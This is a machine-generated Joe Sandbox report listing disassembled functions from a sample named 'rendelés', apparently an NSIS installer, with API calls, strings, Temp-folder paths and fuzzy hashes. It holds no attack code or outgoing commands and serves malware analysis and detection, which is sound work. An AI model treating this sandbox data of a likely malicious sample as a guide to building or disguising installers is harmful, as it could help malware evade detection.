Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction ID: ce4c7d6d39dceca23aa6ebdb29af7737867007859e7bede0b388bd4d525dd41f
Opcode Fuzzy Hash: b2affdf3b53bee8738e3b61904ea6c87bda347b462d3853a737802ef9deed65a
Instruction Fuzzy Hash: 3C014C71940219BADB00DBA4DD85BFEBBB8AF54711F10012BBB50B61C0D6B49A058BA5

Function 00401E4E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401E51
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E6B
MulDiv.KERNEL32(00000000,00000000), ref: 00401E73
ReleaseDC.USER32(?,00000000), ref: 00401E84

Part of subcall function 004066A5: lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 0040684A
Part of subcall function 004066A5: lstrlenW.KERNEL32(Call,00000000,00422728,?,00405701,00422728,00000000), ref: 004068A4

CreateFontIndirectW.GDI32(0040CDF8), ref: 00401ED3

Strings

Tahoma, xrefs: 00401EB9

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectReleaselstrcatlstrlen
String ID: Tahoma
API String ID: 2584051700-3580928618
Opcode ID: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
Instruction ID: b9cc094806d22c325402cb6ccb5f5134c2025175c414775df3ff87de861ccae2
Opcode Fuzzy Hash: e128970cf71a0b284ce18b21917758e509e5717976d06807f88455f58f814df6
Instruction Fuzzy Hash: 8401B571900241EFEB005BB4EE89A9A3FB0AB15301F208939F541B71D2C6B904459BED

Function 00402F93 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402FB1
wsprintfW.USER32 ref: 00402FE5
SetWindowTextW.USER32(?,?), ref: 00402FF5
SetDlgItemTextW.USER32(?,00000406,?), ref: 00403007

Strings

unpacking data: %d%%, xrefs: 00402FD3, 00402FE3
verifying installer: %d%%, xrefs: 00402FDA

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction ID: 34ad84b97f90b05cf42cbebec4ee1aaae98efe268bf46a139428006d78f28757
Opcode Fuzzy Hash: b65fa6b26e28fa793ab4966251e07a6fe500b79f9b1e2f9c66e5bc42e84335f7
Instruction Fuzzy Hash: 25F0497050020DABEF246F60DD49BEA3B69FB00309F00803AFA05B51D0DFBD9A559F59

Function 6FC62655 Relevance: 9.1, APIs: 6, Instructions: 109COMMON

Download Yara Rule

APIs

Part of subcall function 6FC612BB: GlobalAlloc.KERNELBASE(00000040,?,6FC612DB,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612C5

GlobalFree.KERNEL32(?), ref: 6FC62743
GlobalFree.KERNEL32(00000000), ref: 6FC62778

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: b79e56c096c0b83e7c4bd7260c1ef645144aee4baf2be8fd19a10f45d8ea996b
Instruction ID: ae91b3b1ed7cbbefe553dd7d09ec188bcb59405ac39cf907552e2fd9a1f0997d
Opcode Fuzzy Hash: b79e56c096c0b83e7c4bd7260c1ef645144aee4baf2be8fd19a10f45d8ea996b
Instruction Fuzzy Hash: 3D31C27150C502EFCF158F6AC9E4CBA77B6FF873553144529F20197160EB31A8259B61

Function 00402950 Relevance: 9.1, APIs: 6, Instructions: 91memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 004029B1
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004029CD
GlobalFree.KERNEL32(?), ref: 00402A06
GlobalFree.KERNEL32(00000000), ref: 00402A19
CloseHandle.KERNEL32(?,?,?,?,?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A35
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,000000F0), ref: 00402A48

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction ID: 78b93316678d616cb595922dcd62a83f4062aa2fb33f08fb70827f98fa9650ab
Opcode Fuzzy Hash: cc682eb677fc0cdddcbf9664361c627099a0f91e8e9c012db3e8b517a211182c
Instruction Fuzzy Hash: E131B171D00124BBCF216FA9CE89D9EBE79AF09364F10023AF461762E1CB794D429B58

Function 00404E71 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
wsprintfW.USER32 ref: 00404F1B
SetDlgItemTextW.USER32(?,00423748), ref: 00404F2E

Strings

H7B, xrefs: 00404F04
%u.%u%s%s, xrefs: 00404EFC

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
Instruction ID: 20619224473e8c08b4fba53027c62ddcf1c3fef784a2ba69f514aa474de30786
Opcode Fuzzy Hash: 2edccdcb36c72f9bdce7a586f7ca7ee262dfb9f9a49697097ea36a1117f17e36
Instruction Fuzzy Hash: 1A11D8736041283BDB00A5ADDC45E9F3298AB81338F150637FA26F61D1EA79882182E8

Function 6FC61979 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 6FC619DA
GlobalFree.KERNEL32(?), ref: 6FC61B7A
GlobalFree.KERNEL32(?), ref: 6FC61B7F

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: fee2d2bd6df0c2e05db072541dfd77b11928a1f33885ce9563a0712ef002062c
Instruction ID: ff49f8dc784120054767a87f9c332dfe8321583357252f021bb8b2355be4e64e
Opcode Fuzzy Hash: fee2d2bd6df0c2e05db072541dfd77b11928a1f33885ce9563a0712ef002062c
Instruction Fuzzy Hash: 0C51B4B2D0C119AA8B009FBD85C05ADBBB5FFC9B17F00925BD404A7250F771BA4987A1

Function 6FC62480 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 6FC625C2

Part of subcall function 6FC612CC: lstrcpynW.KERNEL32(00000000,?,6FC6137F,00000019,6FC611CA,-000000A0), ref: 6FC612DC

GlobalAlloc.KERNEL32(00000040), ref: 6FC62548
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 6FC62563

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 7594270c389c7bc4e52be183e24e37d2d4e7d2ba4f1386334431daa1686985e3
Instruction ID: 164f3a8951c04560038f8160863b42e429de1fb5d2d2e881aeeadd382a8a43a7
Opcode Fuzzy Hash: 7594270c389c7bc4e52be183e24e37d2d4e7d2ba4f1386334431daa1686985e3
Instruction Fuzzy Hash: 8A41CDB050C706EFDB249F2AD8E0AA677F8FB85315F108A2EE54686181F730A545CB61

Function 00401D81 Relevance: 7.6, APIs: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D9A
GetClientRect.USER32(?,?), ref: 00401DE5
LoadImageW.USER32(?,?,?,?,?,?), ref: 00401E15
SendMessageW.USER32(?,00000172,?,00000000), ref: 00401E29
DeleteObject.GDI32(00000000), ref: 00401E39

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction ID: 4d725fdcf847a80329c23b38d7164c003567f542edd6fcacfb34c9ebeef40da9
Opcode Fuzzy Hash: 100b3177012869429c2005611ce111630833f28d1ab152a2d5a2575cfc39775b
Instruction Fuzzy Hash: 67212672904119AFCB05CBA4DE45AEEBBB5EF08304F14003AF945F62A0CB389951DB98

Function 6FC616BD Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616D5
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616DC
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,6FC622D8,?,00000808), ref: 6FC616F0
GetProcAddress.KERNEL32(6FC622D8,00000000), ref: 6FC616F7
GlobalFree.KERNEL32(00000000), ref: 6FC61700

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 40d08df92407d5b5e543701c9f67ad2d0ce533ef6bd1d43c17eceed28b73aa12
Instruction ID: 325d4e3ec8b57e31ea6f23b2258bdd9eb4f8d5c4e20dcd5910be14312842019b
Opcode Fuzzy Hash: 40d08df92407d5b5e543701c9f67ad2d0ce533ef6bd1d43c17eceed28b73aa12
Instruction Fuzzy Hash: 4FF0127210A5397BDA2016E78C4CCAB7EACEF8B2F5B110211F71892190C5614C11D7F1

Function 00401C43 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB

Strings

!, xrefs: 00401C7F

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction ID: e1c20d37316975b9b94706f7b3abd8da4b7b3b5136eece5bd2aa3cbae88a6c19
Opcode Fuzzy Hash: b183ccb6ab3284ced798d12f720e161a9248df31e23c89b80f307d5b894ef539
Instruction Fuzzy Hash: 28219E7190420AEFEF05AFA4D94AAAE7BB4FF44304F14453EF601B61D0D7B88941CB98

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
lstrcatW.KERNEL32(?,0040A014), ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Function 6FC610E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6FC61171
GlobalAlloc.KERNEL32(00000040,?), ref: 6FC611E3
GlobalFree.KERNEL32 ref: 6FC6124A
GlobalFree.KERNEL32(?), ref: 6FC6129B
GlobalFree.KERNEL32(00000000), ref: 6FC612B1

Memory Dump Source

Source File: 00000000.00000002.2217875107.000000006FC61000.00000020.00000001.01000000.00000005.sdmp, Offset: 6FC60000, based on PE: true

Associated: 00000000.00000002.2217730444.000000006FC60000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217906427.000000006FC64000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.2217926211.000000006FC66000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6fc60000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9ba120b3285995f71a330799b9506668607da2d8143988660e683572ad4402bb
Instruction ID: 466cec371103313bb1d2f30be50283047ce1798bc1d5dfe01fd750e6c1d7a041
Opcode Fuzzy Hash: 9ba120b3285995f71a330799b9506668607da2d8143988660e683572ad4402bb
Instruction Fuzzy Hash: 5B516FB590C602DFDB00CF6EC9849657BF8FF06B2AB10451AEA44DB251F735E954CB50

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsm3A84.tmp, xrefs: 00402683
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsm3A84.tmp$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp\System.dll
API String ID: 1659193697-2336392907
Opcode ID: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
Opcode Fuzzy Hash: 4550f8a347c51466d0af7a45a977123d0158099263826babcca4c1342fca1a91
Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
C:\Users\user\AppData\Local\Temp\nsm3A84.tmp, xrefs: 00403C5B

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171071376.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171083315.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2171163409.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_rendel#U00e9s_1023200000000000305.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsm3A84.tmp
API String ID: 2962429428-3803279235
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675

Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00405FF0
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D

lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0,00000000), ref: 00406098
GetFileAttributesW.KERNEL32(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,75923420,?,75922EE0,00405D94,?,75923420,75922EE0), ref: 004060A8

Strings

P_B, xrefs: 00406045

Memory Dump Source

Source File: 00000000.00000002.2171058096.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2171045091.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
